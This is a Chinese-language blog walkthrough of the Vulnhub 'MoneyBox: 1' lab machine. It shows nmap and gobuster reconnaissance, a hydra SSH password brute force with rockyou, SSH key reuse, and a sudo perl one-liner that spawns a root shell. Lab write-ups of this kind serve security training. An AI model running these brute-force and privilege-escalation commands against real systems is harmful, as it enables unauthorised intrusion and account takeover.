首页 > 其他分享 >Vulnhub: MoneyBox: 1靶机

Vulnhub: MoneyBox: 1靶机

时间:2023-08-14 19:35:02浏览次数:53  
标签:MoneyBox 111.194 sudo 192.168 ssh 靶机 lily Vulnhub

kali:192.168.111.111

靶机:192.168.111.194

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.194

image

ftp匿名登录发现trytofind.jpg

image

目录爆破发现blogs目录

gobuster dir -u http://192.168.111.194 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

image

访问后查看源码提示另一个目录S3cr3t-T3xt

image

访问S3cr3t-T3xt目录查看源码

image

该密码为图片隐写的密码3xtr4ctd4t4

image

用提示的用户爆破ssh

hydra -l renu -P /usr/share/wordlists/rockyou.txt 192.168.111.194 -s 22 ssh -t 64

image

提权

查看/home/lily/.ssh/authorized_keys,发现renu用户可以使用证书登录lily用户

image

登录后查看sudo权限

ssh [email protected]

image

提权方法:https://gtfobins.github.io/gtfobins/perl/#sudo

image

提升为root

sudo -u root perl -e 'exec "/bin/sh";'

image

flag

image

标签:MoneyBox,111.194,sudo,192.168,ssh,靶机,lily,Vulnhub
From: https://www.cnblogs.com/ctostm/p/17629532.html

相关文章

  • Vulnhub: DriftingBlues: 3靶机
    kali:192.168.111.111靶机:192.168.111.192信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.192查看robots.txt得到提示访问eventadmins提示littlequeenofspades.html查看littlequeenofspades.html源码base64解密后提示adminsfixit.php......
  • Vulnhub 靶场 MATRIX-BREAKOUT: 2 MORPHEUS
    前期准备:靶机地址:https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/kali攻击机ip:192.168.11.11靶机ip:192.168.11.12一、信息收集及利用1.使用nmap对目标靶机进行扫描发现开放了22、80、81端口。2.80端口访问80端口:查看页面信息没发现什么重要信息,......
  • Vulnhub: ColddWorld: Immersion靶机
    kali:192.168.111.111靶机:192.168.111.183信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.183查看login的源码发现提示:page和文件/var/carls.txt漏洞利用wfuzz探测account.php页面发现文件包含,参数为pagewfuzz-c-w/opt/zidian/SecLists......
  • Vulnhub: DriftingBlues: 6靶机
    kali:192.168.111.111靶机:192.168.111.180信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.180查看robots.txt发现存在目录:/textpattern/textpattern访问后发现是textpatterncms目录爆破发现文件spammer,访问后发现是个压缩包,解压需要密码,......
  • Vulnhub: blogger:1靶机
    kali:192.168.111.111靶机:192.168.111.176信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.176在80端口的/assets/fonts/目录下发现blog目录,访问后发现为wordpress利用wpscan发现wordpress插件wpdiscuz存在任意文件上传漏洞wpscan--urlhtt......
  • Vulnhub: hacksudo: aliens靶机
    kali:192.168.111.111靶机:192.168.111.175信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.175目标80端口backup目录存在文件mysql.bak,下载后查看获得mysql账号密码登录9000端口的phpmyadmin,执行sql语句写入webshellselect'<?phpsystem($......
  • Vulnhub: BlueMoon: 2021靶机
    kali:192.168.111.111靶机:192.168.111.174信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.17480端口目录爆破,发现文件:hidden_textgobusterdir-uhttp://192.168.111.174-w/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-m......
  • vulnhub_DC_6_wp
    前言靶机地址:https://www.vulnhub.com/entry/dc-6,315/靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip攻击机地址:192.168.20.135靶机探测nmap-sn192.168.20.0/24192.168.20.149为靶机地址端口扫描nmap-p-192.168.20.149详细信息扫描nmap-A-p22,80192.......
  • Vulnhub: Wayne Manor:1靶机
    kali:192.168.111.111靶机:192.168.111.172信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.172根据提示修改hosts文件访问目标80,在主页发现三组数字,结合端口扫描的结果中21端口被过滤,猜测存在端口碰撞knock-v192.168.111.172300350400......
  • vlunhub靶场,kali扫不到靶机解决方法
    在靶机开机或者重启界面会出现下图界面,然后按e就可以进入编辑。 按e后就会进入下图界面。 在下图这个界面将 roquiet 改为 rwsingleinit=/bin/bash. 修改完成后按    ctrl+x  进入编辑输入ipa查看本地网卡名称,本机网络网卡名称为ens33ipa 进入i......